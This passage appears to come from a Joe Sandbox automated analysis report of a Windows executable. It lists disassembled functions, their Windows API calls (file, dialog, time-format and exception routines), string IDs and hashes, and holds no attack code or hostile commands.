                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 22de15e310106a2592fa8d0853264a3e5bbc2f0dd6123348af38db9be4aab0be
                  • Instruction ID: 436f71f4c0abd78371fa378e4796933ff36591cb9f02966682fba77e1c0f1005
                  • Opcode Fuzzy Hash: 22de15e310106a2592fa8d0853264a3e5bbc2f0dd6123348af38db9be4aab0be
                  • Instruction Fuzzy Hash: F4A011AB2BC00BBCB00822803E0BCBA033CE8C0B203328C2ABA0A800C0AA800C080830
                  Function 00A0DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DC36
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b07759e1d0d67c2ff6ca4f4982990c68500fd48a4d4a81ffd40ccf2eaa200e19
                  • Instruction ID: 9da5b79a53e026b956958802d7226600a9d4a89c5eda7c6eca1864b3a6b601bc
                  • Opcode Fuzzy Hash: b07759e1d0d67c2ff6ca4f4982990c68500fd48a4d4a81ffd40ccf2eaa200e19
                  • Instruction Fuzzy Hash: DEA002B757D117BD710C61957E16D76032CD4C4B513358D19B506940D555C05C455431
                  Function 00A0DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DC36
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d2e84ed0034dc305ca1dfb89a3be8399dfc71027a48246ad4ddb5af2d27796c8
                  • Instruction ID: 9da5b79a53e026b956958802d7226600a9d4a89c5eda7c6eca1864b3a6b601bc
                  • Opcode Fuzzy Hash: d2e84ed0034dc305ca1dfb89a3be8399dfc71027a48246ad4ddb5af2d27796c8
                  • Instruction Fuzzy Hash: DEA002B757D117BD710C61957E16D76032CD4C4B513358D19B506940D555C05C455431
                  Function 00A0A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  APIs
                  • SetCurrentDirectoryW.KERNELBASE(?,00A0A587,C:\Users\user\Desktop,00000000,00A3946A,00000006), ref: 00A0A326
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CurrentDirectory
                  • String ID:
                  • API String ID: 1611563598-0
                  • Opcode ID: 954668417c0d9115175c7ea7af78046dc55d56dc4a25ee209eead30d62256f77
                  • Instruction ID: e9cb18b9b806d79168899a7ff968161c8d2dc35b4404c01a0b9dbcd31043e1bb
                  • Opcode Fuzzy Hash: 954668417c0d9115175c7ea7af78046dc55d56dc4a25ee209eead30d62256f77
                  • Instruction Fuzzy Hash: 2FA01231194006568E104B34CC09C2576505761702F0087307002C00A0CB308825A500

                  Non-executed Functions

                  Function 00A0B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A0B971
                  • EndDialog.USER32(?,00000006), ref: 00A0B984
                  • GetDlgItem.USER32(?,0000006C), ref: 00A0B9A0
                  • SetFocus.USER32(00000000), ref: 00A0B9A7
                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A0B9E1
                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A0BA18
                  • FindFirstFileW.KERNEL32(?,?), ref: 00A0BA2E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A0BA4C
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A0BA5C
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A0BA78
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A0BA94
                  • _swprintf.LIBCMT ref: 00A0BAC4
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00A0BAD7
                  • FindClose.KERNEL32(00000000), ref: 00A0BADE
                  • _swprintf.LIBCMT ref: 00A0BB37
                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 00A0BB4A
                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A0BB67
                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00A0BB87
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A0BB97
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A0BBB1
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A0BBC9
                  • _swprintf.LIBCMT ref: 00A0BBF5
                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00A0BC08
                  • _swprintf.LIBCMT ref: 00A0BC5C
                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 00A0BC6F
                    • Part of subcall function 00A0A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A0A662
                    • Part of subcall function 00A0A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00A2E600,?,?), ref: 00A0A6B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                  • API String ID: 797121971-1840816070
                  • Opcode ID: 448b44498fff1aa66ac341ee11ce9e68d0cdfdc2b70b84732fc86d260868068f
                  • Instruction ID: 14ffce51cd044e0fb4ab9d29841016a10d940d93712553f0d2cee42a6eee5a98
                  • Opcode Fuzzy Hash: 448b44498fff1aa66ac341ee11ce9e68d0cdfdc2b70b84732fc86d260868068f
                  • Instruction Fuzzy Hash: C091B372148348BBD631DBA4DD49FFB77ACFB8A701F040929B749D2081DB759A058B72
                  Function 009F718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F7191
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 009F72F1
                  • CloseHandle.KERNEL32(00000000), ref: 009F7301
                    • Part of subcall function 009F7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 009F7C04
                    • Part of subcall function 009F7BF5: GetLastError.KERNEL32 ref: 009F7C4A
                    • Part of subcall function 009F7BF5: CloseHandle.KERNEL32(?), ref: 009F7C59
                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 009F730C
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 009F741A
                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 009F7446
                  • CloseHandle.KERNEL32(?), ref: 009F7457
                  • GetLastError.KERNEL32 ref: 009F7467
                  • RemoveDirectoryW.KERNEL32(?), ref: 009F74B3
                  • DeleteFileW.KERNEL32(?), ref: 009F74DB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                  • API String ID: 3935142422-3508440684
                  • Opcode ID: 9670f74b1a209a2778013b223c92ba3451df2954ce1e23051715f13e10614c8a
                  • Instruction ID: b74a219fca023093bcc1699b31ce24d09f16b0bbc77dfb00151e0bf8650c6087
                  • Opcode Fuzzy Hash: 9670f74b1a209a2778013b223c92ba3451df2954ce1e23051715f13e10614c8a
                  • Instruction Fuzzy Hash: E4B1E171904219ABDF20DFA4DC41FFEB7B8AF44304F0444A9FA49E7192D774AA49CBA1
                  Function 009F3281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID: CMT$h%u$hc%u
                  • API String ID: 3004599000-3282847064
                  • Opcode ID: 95503b04b5bed3af9c3b79571e699901111a7dee1cee1009935e7598bad998cc
                  • Instruction ID: 19cffdbf3306852169340525f86ab79abd5b4f4afff859235e9a2c109105c993
                  • Opcode Fuzzy Hash: 95503b04b5bed3af9c3b79571e699901111a7dee1cee1009935e7598bad998cc
                  • Instruction Fuzzy Hash: 8E32927151428C9BDF14DF64C985BFA37A9AF54300F44857EFE8ACB282DB74A948CB60
                  Function 00A1D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: f81796501c5ad1485d451c3fa238a15bc39c8ea17f722b53abbfbfc6e162612c
                  • Instruction ID: 0522f3c95bd32b3d502a71f7d8e6df5dde7d9d45a8b24f473a9e7090884519f7
                  • Opcode Fuzzy Hash: f81796501c5ad1485d451c3fa238a15bc39c8ea17f722b53abbfbfc6e162612c
                  • Instruction Fuzzy Hash: 4CC21971E086288FDB25CF289D407EAB7B5EB88315F1545EAD85EE7240E774AEC18F40
                  Function 009F27E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F27F1
                  • _strlen.LIBCMT ref: 009F2D7F
                    • Part of subcall function 00A0137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,009FB652,00000000,?,?,?,0001042A), ref: 00A01396
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F2EE0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                  • String ID: CMT
                  • API String ID: 1706572503-2756464174
                  • Opcode ID: f7a4aeeb869f6ae45047f77d5e34fb8d989772a430b038c9bfe01627d6c24025
                  • Instruction ID: d8eaa70d4e52ce1a332ea0ce85c4c9809d7349661f443ea4778ae0bcbf17ac82
                  • Opcode Fuzzy Hash: f7a4aeeb869f6ae45047f77d5e34fb8d989772a430b038c9bfe01627d6c24025
                  • Instruction Fuzzy Hash: 3562E2716042488FDF18DF38C9957FA3BE5AF54304F08857EEE9A8B282DB74A945CB50
                  Function 00A1866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A18767
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A18771
                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00A1877E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: c77ca8d553f52a609bfb4237a50cfec3cf411ea167f3e85d7fbbcc7322229867
                  • Instruction ID: c86de25187df60329dc772cdb922e3be5478e3816cb9866af7524c50144409c9
                  • Opcode Fuzzy Hash: c77ca8d553f52a609bfb4237a50cfec3cf411ea167f3e85d7fbbcc7322229867
                  • Instruction Fuzzy Hash: F531B575D0122C9BCB21DF68D989BDCB7B4BF18310F5041EAE81CA7291EB349B858F45
                  Function 00A1CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction ID: ef3d6e8246e1b71034f5ac2318a2b8008135689c150d88ff1104c5afe5004757
                  • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction Fuzzy Hash: 75022C71E402199FDF14CFA9D9806EDBBF1EF88324F25816AD919E7384D731AA418B84
                  Function 00A0A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A0A662
                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,00A2E600,?,?), ref: 00A0A6B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FormatInfoLocaleNumber
                  • String ID:
                  • API String ID: 2169056816-0
                  • Opcode ID: 9bb4a5a1e1331b7f1a30f9dafebac7218c46f462f12a4b7ee7d5fd7783399b43
                  • Instruction ID: 39e5308b2ca6cb85fec3a4bf0330c3dc689df3bc7aee17e6d0386446ab4b1e30
                  • Opcode Fuzzy Hash: 9bb4a5a1e1331b7f1a30f9dafebac7218c46f462f12a4b7ee7d5fd7783399b43
                  • Instruction Fuzzy Hash: 2F015E3A100208BADB20CFA8EC45FAB77BCFF59710F004522BA04A7190D3719A668BE5
                  Function 009F6EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(00A0117C,?,00000200), ref: 009F6EC9
                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 009F6EEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  • Opcode ID: 250aff5024a5fdc90f4144d73b0c6eae7ff99bc4899ba55ba1be47d22cbcac3a
                  • Instruction ID: 0779988989806050c993efde72f2fdcd71f2c69bd32af8f261be5339c98bf796
                  • Opcode Fuzzy Hash: 250aff5024a5fdc90f4144d73b0c6eae7ff99bc4899ba55ba1be47d22cbcac3a
                  • Instruction Fuzzy Hash: 43D0C7373D8306BFEE214A78CC05F377B546756B42F108524B357D94D0C57490269729
                  Function 00A21194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A2118F,?,?,00000008,?,?,00A20E2F,00000000), ref: 00A213C1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: 0eef6e3f240827fe10f05995e4ae1effb3637fef102b1ac442d2804a1a91779d
                  • Instruction ID: 5c61c0365575d77416b0ecbb714cc394cdd72b7ef396adc409d43e1ad3013c1a
                  • Opcode Fuzzy Hash: 0eef6e3f240827fe10f05995e4ae1effb3637fef102b1ac442d2804a1a91779d
                  • Instruction Fuzzy Hash: 8FB17B71610618CFD719CF2CD48ABA57BE1FF15364F298668E899CF2A1C335E982CB40
                  Function 009F407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: gj
                  • API String ID: 0-4203073231
                  • Opcode ID: 9cf42ec2ad5741e2bf0806e2ffdbc0bba4d03e930373e7d42ec1ede04b4a4080
                  • Instruction ID: e46ab5c969c649ec34b1b36263d5dcd56b6243b10e6758f792b0ada78e40044c
                  • Opcode Fuzzy Hash: 9cf42ec2ad5741e2bf0806e2ffdbc0bba4d03e930373e7d42ec1ede04b4a4080
                  • Instruction Fuzzy Hash: F8F1C2B2A083418FD748CF29D880A1BFBE1BFC8208F15892EF598D7711E774E9558B56
                  Function 009FACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                  Download Yara Rule
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 009FAD1A
